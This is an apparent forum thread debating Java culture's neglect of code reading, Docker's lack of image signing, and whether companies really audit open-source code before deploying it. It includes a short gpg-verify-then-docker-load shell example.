Although it's not limited to one language or culture, this is one of my main beefs with Java culture. It has thoroughly given up on reading code. Don't get me wrong: reading code (at least, typical code, not best-of-class code) is difficult, unpleasant, and slow and, because of this, you invariably have to trust a lot of code without manually auditing it. But I like having the idea that I can. The cultures of C, OCaml, Haskell, and to a degree Python, all still have this. People still read source code of the infrastructure that they rely upon. But the Java culture is one that has given up on the concept of reading code (except with an IDE that, one hopes, does enough of your thinking for you to get you to the right spot for the bug you are fighting) and understanding anything in its entirety is generally not done.


The problem is you old sysadmins are so passé. Software has replaced you, and you need to get over it. Developers are finally liberated to move at full speed without hearing "NO"


There certainly are sysadmins who build their authority and power only on having exclusive access to the root account.


So much truth spoken in the linked text. Thanks.

It has to be said. Damn the containers and the Windows-ization of Linux.


Containers are very helpful for isolating closed-source programs. I don't like to run Steam within my normal Debian system.


Except that Docker explicitly allows and encourages signing of core infrastructure containers.


Not even close. Docker now has some terrible attempts at signing images on their registry, iirc (docker inc signs them for the docker client).

There is no option for me, as a user, to build and sign my own image with my own pgp key, afaik. My organization might already have a chain of trust, and docker is asking me to ignore that and just trust their signatures (which also only work on dockerhub as of docker 1.5... I don't know about 1.6, because you can't use docker for at least a month after a release, else security holes galore).

Docker did nothing to encourage signing containers. At 1.0 they had no capability to do any signing or verification whatsoever. It's being added as an afterthought, and poorly.

If you look at the AppContainer spec, signatures (pgp-based) were built in from the very beginning: it lets me create my own chain of trust (including incorporating others' keys), sign my own images, and trust someone else's signature; it does not trust the transport or storage medium, and it has integration with the clients.

If you want to convince me docker cares, you're going to have to give me examples of where they didn't fuck up...

Tell me how I can use docker's tools to sign my own images, optionally trust my friend Alice, and securely download images that she uploaded to her own registry or dockerhub but signed with her gpg key without me having to trust docker inc.

To my knowledge, all docker has right now is a 'tarsum' of images, which assumes the registry is trusted and, even given that, can be downgraded fairly trivially for backwards-compatibility reasons.


Docker didn't fuck up when they hired the Square guys. http://blog.docker.com/2015/03/secured-at-docker-diogo-monic...

I agree that security and provenance are real issues in Docker. They are, however, being worked on, and they will be solved. Presumably we will end up with some sort of app-store-like framework with proper signatures and verification.

Docker can't do everything at once. Give them a chance. The new version of the registry is a major step forward in this regard.

In the meantime, what you can do is take Red Hat's advice. Rather than using a registry to get your images, operate a download site which stores archives of docker images that you can import with `docker load`. You can then also store signatures and check them yourself.
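
A sketch of that workflow (URLs and filenames hypothetical): publish the image archive with a detached signature, verify it, then load it:

  curl -fsSLO https://downloads.example.com/myimage-1.2.tar
  curl -fsSLO https://downloads.example.com/myimage-1.2.tar.asc
  gpg --verify myimage-1.2.tar.asc myimage-1.2.tar \
    && docker load -i myimage-1.2.tar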


Cool, they hired some people, but I haven't noticed better security for it yet.

Security is a real issue in docker and it is being worked on, but I don't think "give them a chance" is a justifiable response. They're not focusing on it strongly. They should already have focused on it, and didn't. Their entire codebase was written without a security design in place, so there's likely deep-seated refactoring that'll need to be done before any new security-related features should be trusted.

They're working harder on monetizing and pushing docker as a production-ready standard as far as I can tell... I can understand not doing security before functionality, but it absolutely should be there before 1.0 or before you encourage others to use your software.

Docker has already lost any chance of me trusting their security with their lack of focus on it and I don't think it's excusable.

And if I'm doing what you say at the end, why the hell would I be using docker anyway? I can already turn a tarballed fs into a linux container without docker (ty lxc); I thought the whole point of docker was sharing images and building on them and ... and having massive security flaws. Right.


I agree that security should have been in place before they went 1.0. However, if you look at the work on the new version of the registry (docker/distribution on GitHub), they are taking things more seriously and trying to get the basics right.

I find your last point a bit strange. We all know the Docker development experience is a lot better than raw lxc. I'm saying you can (and probably should) be more careful about provenance than the Docker Hub is. Note that there are alternatives to the Hub with better provenance stories, e.g. https://access.redhat.com/search/#/container-images (from https://securityblog.redhat.com/2014/12/18/before-you-initia...). This might make things a bit more awkward than they were before, but it's still not the same as raw LXC.

I feel your anger and I think it's understandable, but that doesn't mean things won't get better.


>> Security is a real issue in docker and it is being worked on, but I don't think "give them a chance" is a justifiable response.

For a public facing system I would agree that means it's not ready for production use yet...


haha you're my new hero

YOU ONLY LIVE ONCE MAN! trust the (maven) system


[deleted]


    > As far as I know, it's also still standard practice in
    > most companies to either read the source code of open-
    > source stuff before deploying it to production (binary
    > or build) or get a support contract from someone else
    > who has
I'm afraid I have no better, more cogent response for this than 'lol'.



Thanks for the share. =)

I'll queue this to read later, but just reading the executive statement, it seems to jibe with a lot of the discussion here.

The issue isn't that code review /shouldn't/ be taking place, or even that there aren't directives stating that it should be done. It's that it isn't being done, and that's a problem.


At the risk of my karma I'll have to maintain that for companies who are subject to regulation (publicly-traded companies, banks, etc.) what I said is still standard. Unless you have any specific instances to the contrary you're willing to offer?


Coming from my background (DoD, don't laugh), code review of anything other than in-house-developed applications never occurs. In any instance where open source is used, it is mandated that it come with a support contract (per DISA STIG), which provides the support and accountability the organization is looking for.

So, with regard to your assertion: the second clause (support contract)? Definitely. The first (code review)? Never.

That's the view from my side of the fence, anyways.


    > for companies who are subject to regulation (publicly-
    > traded companies, banks, etc.) 
Well for starters, that's not most companies, or even that many companies as a percentage of the whole.

The only places I've ever seen (or even heard of) this being done are banks and defense.

It ain't in ISO27001, and so nobody cares.


In defense, it's too expensive to do in-house. However, security software and some operating systems, either closed source or open, are evaluated under Common Criteria (https://www.commoncriteriaportal.org/). But the evaluation process is rather long and often lags behind the current version by a year or more in some cases.


I've never worked in a place that insisted on source code being read for FOSS components.

I've worked in places where there's a restricted list of 'approved' open source stuff, but that's been more to do with licensing.


I've never seen anyone evaluating code in the environments I've been in. In many ways, I run into the reverse, where it's a given that these build processes are obtuse, and so they're simply distrusted rather than pulled apart. Administrators rely either on paid products or on long, manual processes.

I've unfortunately had more than one mind-numbing conversation where another administrator will tell me that it's a "script" and therefore I don't know what it does, and that there "may be" some hidden black magic that will instantly pwn all of our systems. Attempting to explain that I verified the functionality line by line brings blank stares, as if it were utterly impossible for someone to derive the dark magics that are code.

Thankfully, I haven't run into many instances where software is blindly installed as the author relates, but his point that "no one knows how it works", combined with the lack of attribution, creates an environment of mistrust which greatly limits our ability to take advantage of open source software.


> As far as I know, it's also still standard practice in most companies to either read the source code of open-source stuff before deploying it to production (binary or build) or get a support contract from someone else who has.

Reading the source code might be the case if you are in a large enterprise that can afford to keep those programmers busy or actually needs to vet the code, but I honestly doubt it. Just check the LOC count on something as common as Hadoop (close to 1 million [1]), and that is excluding the "stack" described in the article. I wanna bet you, because we all know how volatile the job market is, that even the guys building or supporting the software did not write or read even half of that code.

[1] https://www.openhub.net/p/Hadoop/analyses/latest/languages_s...


I suspect this is why, when many companies decide they want to use open source stuff, they contract with companies like GitHub, who absorb the risk of using git, etc., rather than trying to vet the code themselves. I still have a hard time envisioning anyone in any position of authority in any credible company accepting the idea of installing open source software without vetting it one way or the other. If the shit did hit the fan, their career would be pretty much over.


companies like GitHub, who absorb the risk of using git

Except they don't do that at all?

If a bug in git would cost your company a lot of money, why do you think GitHub would be accountable if you have some enterprise deal there?

I still have a hard time envisioning anyone in any position of authority in any credible company accepting the idea of installing open source software without vetting it one way or the other.

Well, that is an entirely different thing. People TEST stuff before deploying it. But that has little to do with code reading or mandatory support contracts.


it's also still standard practice in most companies to either read the source code of open-source stuff before deploying it to production

Eh, no.


I'd love a specific example. Because in many countries, if they're publicly traded or subject to other regulations (such as Basel, etc.), any company that didn't would be breaking the law.


I'd love a specific counter-example. I've never in my life encountered a sysadmin who read all or even part of the source code of any major package before deploying it. I mean, do you read the source code of the Linux kernel, PostgreSQL, nginx, OpenSSL, ... before installing it?

If Basel requires that level of auditing, I'd love to see a cite. There are some pretty heavy-handed regulations out there, but this would be clearly unworkable.


Given the context, it's probably a bad idea to name employers, but I've literally never seen this happen at any company I worked for, and I did consulting, so that's quite a few.

I wonder what laws you're referring to that require companies to have read the innards of the products they deploy.

Even the "getting a support contract from someone who does". Do you think for example Red Hat has read every single line of code shipped in RHEL?


I've worked in the USA, UK and Australia.

I've never seen what you describe. And one of the companies is a huge multinational.


Which laws are you referring to? Is this a strange interpretation of Sarbanes-Oxley or HIPAA?


I'd be interested to hear if you have an example of a company that did read the source code of the apps it used?

Also which law do you think they would be breaking by not reading the source code of products used?


Excellence in security practices (open source or otherwise) is the exception, not the norm.

I've worked in multiple large companies, and even getting package signing turned on requires a lead pipe. Docker and similar tools can enable an org to move those types of responsibilities "over/down" to the developer as well, so that now there is no neckbeard-encrusted gate at all.


I want to work where you've been working.

I've never, ever seen this happen.


I want to work there too, except if that means that I will be the one having to read through all open-source code before it is deployed.


And would you be liable for any missed bugs that cause production to break?



